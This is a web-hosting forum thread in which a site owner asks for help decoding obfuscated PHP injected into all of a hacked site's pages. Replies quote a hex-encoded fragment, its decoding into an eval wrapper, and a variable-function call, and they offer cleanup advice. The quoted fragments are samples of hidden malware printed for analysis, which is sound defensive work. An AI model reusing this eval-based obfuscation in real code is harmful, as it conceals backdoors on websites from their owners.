Results 1 to 22 of 22
-
12-14-2013, 12:12 PM #1Web Hosting Guru
- Join Date
- Aug 2004
- Posts
- 346
Website hacked, code added to top of all pages, somebody can decode it???
My websites is hacked and he added some php code to all my pages but for me that is not easy to decode, if somebody know what is this please help me, I want to see decoded php code of this:
http://pastebin.com/GumkwvXP
Thanks.
-
12-14-2013, 03:09 PM #2Web Hosting Master
- Join Date
- Nov 2005
- Posts
- 3,944
I'd be afraid to run this on a non-sandbox environment but it comes down to this actually being run:
Code:$qrkhbdbmht($ivgafnkywx, $skcnswjmwb, NULL);
-
12-14-2013, 03:32 PM #3Web Hosting Master
- Join Date
- Nov 2005
- Posts
- 3,944
I did some more digging, that is a preg_replace with more obfuscation. So there are multiple levels of obfuscation on this code. I suspect it would take a little while to figure out exactly what it is doing. If you are concerned about it, I suggest either you restore all files from a backup or hire a security consultant who can get to the bottom of it.
-
12-15-2013, 07:02 PM #4Junior Guru Wannabe
- Join Date
- Apr 2013
- Posts
- 36
If you can figure out what the data block at the bottom
"\x20\57\x2a\40\x76\147\x69\151\x62\145\x72\146\x6c\171\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\ x28\50\x31\62\x39\55\x39\62\x29\51\x2c\40\x63\150\x72\50\x28\63\x36\62\x2d\62\x37\60\x29\51\x2c\40\x6c\157\x6a\150\x75\145\x78\171\x6e\167\x28\44\x68\ 165\x6e\172\x62\167\x62\147\x64\160\x2c\44\x6d\165\x79\157\x73\155\x75\167\x62\162\x29\51\x29\73\x20\57\x2a\40\x67\172\x74\151\x75\171\x61\162\x74\144 \x20\52\x2f\40"
is it may give you an idea
-
12-15-2013, 08:55 PM #5Web Hosting Guru
- Join Date
- Aug 2004
- Posts
- 346
That is:
/* vgiiberfly */ eval(str_replace(chr\ x28(129-92)), chr((362-270)), lojhuexynw($h\ 165nzbwbgdp,$muyosmuwbr))); /* gztiuyartd */
But still I can`t know what this code doing...
-
12-15-2013, 09:37 PM #6Newbie
- Join Date
- Nov 2009
- Posts
- 15
You can try this tool: http://ddecode.com/phpdecoder/
No matter what the code is doing, you should clean up your site.
-
12-15-2013, 09:40 PM #7Junior Guru Wannabe
- Join Date
- Nov 2013
- Posts
- 42
Why not restore your site from a backup?
-
12-16-2013, 04:19 AM #8Tom Whiting, WHMCS Guru extraordinaire
Linux problems? WHMCS Problems? Give me a shout
Check out my WHMCS Addons
-
12-16-2013, 06:28 AM #9Web Host Reviewer
- Join Date
- Feb 2006
- Location
- Kepler 62f
- Posts
- 16,703
Google this:
muyosmuwbr
- injecting porn ads
- changing (or trying to change) PHP settings
- scanning site users/passwords|| Need a good host?
|| See my Suggested Hosts List || Editorial: EIG/Site5/Arvixe/Hostgator Alternatives
||
-
12-16-2013, 07:26 AM #10Temporarily Suspended
- Join Date
- Dec 2013
- Posts
- 35
Removing this file would solve the hacking problem. Try to scan all the files and folder in the server to completely remove all vulnerable exploits.
As for the code, @kpmedia should be right. Pretty sure it scans username & password throughout the server since I did had a similar file like this once in one of our client's unmanaged server.
-
12-16-2013, 07:38 AM #11Web Hosting Guru
- Join Date
- Aug 2004
- Posts
- 346
I already removed all of this codes from hundred php files but I need to know what this doing...
Thanks.
-
12-17-2013, 01:12 AM #12Web Monkey
- Join Date
- Dec 2005
- Location
- Finland
- Posts
- 1,471
Is this a WordPress site, or something else? Can't help you much without knowing something about the technology.
In any case, you probably have old or unsafe script somewhere.
-
12-17-2013, 07:28 AM #13Web Hosting Guru
- Join Date
- Aug 2004
- Posts
- 346
I have wordpress and phpfox...
-
12-18-2013, 01:05 AM #14Web Monkey
- Join Date
- Dec 2005
- Location
- Finland
- Posts
- 1,471
Well, that's a start.
Are the scripts updated to the latest versions? What kind of theme are you using on the WordPress site? Do you have plugins that may have known vulnerabilities?
If you can restore from a recent backup, that's probably your best bet. I guess there's no such backup or you'd have told us about that. You may want to check if your host is automatically backing up your site, but they're not exactly required to do so.
If you can log in, reinstalling WordPress should remove most instances of code in the system core files. Then you need to check the upload folders, themes, plugins, and config files.
You could install Wordfence to scan the site for any remnants of the hack. It's not always able to find everything, but it's much better than just randomly poking around.
That's a start at least. If it seems overwhelming, please hire a professional to do the cleaning.
-
12-18-2013, 01:18 AM #15Junior Guru
- Join Date
- May 2013
- Posts
- 177
By the way that script itself seems to do absolutely nothing.
-
12-18-2013, 03:48 AM #16Web Monkey
- Join Date
- Dec 2005
- Location
- Finland
- Posts
- 1,471
That's expected. It's likely that there's some sort of trigger or condition, and the script doesn't run if that's not met. It's intended to stay as hidden as possible. It's also possible that the payload or backdoor is somewhere under the site, and that piece is just calling that code.
-
12-18-2013, 06:26 AM #17Junior Guru Wannabe
- Join Date
- Apr 2013
- Posts
- 36
Yeah I decoded bits of it as well - all it seemed to do was wrap itself up about 121 times I think it was and do nothing else - so unless I missed something buried somewhere between the first ten wraps and the last few - it doesn't do anything.
I ran it on a scratch domain on my laptop and it produced zero output.
So i don't know.
-
12-18-2013, 07:09 AM #18Web Hosting Master
- Join Date
- Jan 2004
- Posts
- 1,310
-
12-18-2013, 07:11 PM #19Junior Guru Wannabe
- Join Date
- Apr 2013
- Posts
- 36
HostComparator.com
VPS and Dedicated Server Comparison
The web hosts your mother wouldn't tell you about.
-
12-18-2013, 08:56 PM #20Web Hosting Guru
- Join Date
- Aug 2004
- Posts
- 346
Look like this hacker is very good coder or using some very good tool to encode this code...
-
12-18-2013, 10:17 PM #21Junior Guru
- Join Date
- May 2013
- Posts
- 177
No, it simply doesn't do anything and you can discover that in about 5 minutes.
If you use a PHP formatting tool, you'll see everything is simple string manipulation (without echoing, saving or doing anything to any strings - just manipulating them).
This is the only questionable code.
Code:$qrkhbdbmht($ivgafnkywx, $skcnswjmwb, NULL);
So there, in 3-5 minutes you have discovered that this code performs absolutely nothing at all. No password scanning, nothing at all.
It might be likely that there is other parts involved, and this part along with the others can do something malicious, but given just this code it is completely harmless.
-
12-18-2013, 10:28 PM #22Junior Guru Wannabe
- Join Date
- Apr 2013
- Posts
- 36
it has an eval in there that executes the string $skcnswjmwb returned from the previous manipulation.
It returns a version of the same thing with another $muyosmuwbrHostComparator.com
VPS and Dedicated Server Comparison
The web hosts your mother wouldn't tell you about.
Similar Threads
-
Is your wordpress blog hacked with base64 code, iframe code, etc? Let us clean it!
By ipexperts in forum Other Web Hosting Related OffersReplies: 0Last Post: 02-10-2012, 09:49 PM -
Decode HTML code
By fast_fusion in forum Programming DiscussionReplies: 8Last Post: 06-25-2010, 08:17 AM -
Danger code in my website pages
By majdiy in forum Hosting Security and TechnologyReplies: 6Last Post: 07-27-2009, 03:04 AM -
Hacked - code inserted into many users pages
By FULLAMHRD in forum Hosting Security and TechnologyReplies: 3Last Post: 06-25-2007, 09:23 PM -
Hacked: How to find javascript added to pages in /home
By FULLAMHRD in forum Hosting Security and TechnologyReplies: 5Last Post: 04-24-2007, 03:29 AM